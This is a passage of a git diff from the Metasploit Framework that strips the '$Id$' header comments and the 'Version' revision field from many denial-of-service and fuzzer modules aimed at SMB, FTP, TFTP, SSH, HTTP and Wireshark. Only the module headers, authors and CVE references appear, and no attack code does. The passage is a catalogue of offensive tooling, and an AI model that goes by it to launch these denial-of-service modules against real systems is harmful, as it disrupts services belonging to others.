-## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5666' ], diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index e9b97b3d84..e21cc652d2 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5626'], diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index 446e5de70f..ae96c119ae 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5626'], [ 'OSVDB', '50837'], diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index 085ba760f8..2f12569f74 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ["Sil3nt_Dre4m"], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ] diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index 0c169539fb..490ef0cced 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Leandro Oliveira ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1899' ], diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index c276f5a10d..5096c211ef 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-6938'], [ 'OSVDB', '49998'], diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index cc4664d164..feece39a11 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0657' ], diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index c67f0845dc..8cf3c34453 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '30096'], diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 7b50574cec..46082ee749 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2120' ], diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 714a9eb4af..98d416652d 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['BID', '19215'], diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index b689c8ef69..206df1f4fc 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '27644' ], diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 35fba87753..2bcb0c0a5f 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS09-001'], diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 117af06ff4..3d547e0a7d 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'Laurent Gaffie ', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-3103'], diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index 0d488b31bf..fac7e2713e 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3103'], diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index c9766b1274..8bfc1d9a27 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html'] ], 'Author' => [ 'Laurent Gaffie ', 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index a60fe801ca..add4fb4e1b 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary ['URL', 'http://seclists.org/fulldisclosure/2010/Aug/122'] ], 'Author' => [ 'Laurent Gaffie ', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index a898ac500d..fb0a544949 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ] ], 'Author' => [ 'Cupidon-3005', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 7098c5d53d..dcce89b116 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64340'], diff --git a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb index 018c76d024..38c7bf54ff 100644 --- a/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb +++ b/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64341'], diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index e06089e4e3..618653e912 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '17908'], diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index f54a55de71..b6c8effd87 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1311'], diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 3376889a86..3ada21a895 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'Nullthreat', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2115' ], diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 8bb395547c..568d3d0403 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Matteo Cantoni ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3389'], diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index ee8b2b91a0..ce5e2c691d 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['joernchen (Phenoelit)'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-1140'], diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index 85c138d594..bd79aa3099 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1562' ], diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index 00ca0eeb90..e202281f9e 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index df27a76719..3e66dc05e0 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -8,7 +5,6 @@ # http://metasploit.com/ ## - require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -23,8 +19,7 @@ class Metasploit3 < Msf::Auxiliary This module will connect to a FTP server and perform pre- and post-authentication fuzzing }, 'Author' => [ 'corelanc0d3r ', 'jduck' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE ) register_options( diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index 5b6e2e2c1f..2666425f3e 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary 'Paulino Calderon ' #Added cookie handling ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL','http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer'], diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 8b563acdb3..0c8f0c7333 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of HTTP GET request with incrementing URL lengths. }, 'Author' => [ 'nullthreat' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index c975c7ccb1..706a4c95ba 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of HTTP GET request with malicious URIs. }, 'Author' => [ 'nullthreat' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index c52a775d3a..daea66fac2 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary SMB2 dialect with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 841e8d5062..011437f55a 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary requests using malicious strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 92ba4f7259..3a7f406bc0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB create pipe requests with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']), diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index c427c69871..b4f488dc49 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB negiotiate requests with corrupted bytes }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 4610d4ed83..1497b8b211 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary the NTLMv1 protocol with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(445), diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index 1ab8eef29e..69cf68e858 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary requests using malicious strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index b61b672b72..0b6417ecde 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SMB tree connect requests with corrupted bytes. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test']), diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 24e8b7b396..b76258cf25 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # A Very simple Module to fuzzer some SMTP commands. # It allows to respect the order or just throw everything at it.... @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMTP Simple Fuzzer', - 'Version' => '$Revision$', 'Description' => 'SMTP Simple Fuzzer', 'References' => [ diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 22c1ea02e7..410109b2a5 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with a corrupted initial key exchange payload. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22), diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index 99f16bf75f..1c60e67a81 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with malicious version strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index bee21d2c91..6a4e1182c8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with malicious version strings. }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 3d77f01b5f..a7fb440eed 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,8 +20,7 @@ class Metasploit3 < Msf::Auxiliary This module sends a series of SSH requests with a corrupted version string }, 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22), diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 57bb4a3707..6363a02233 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ 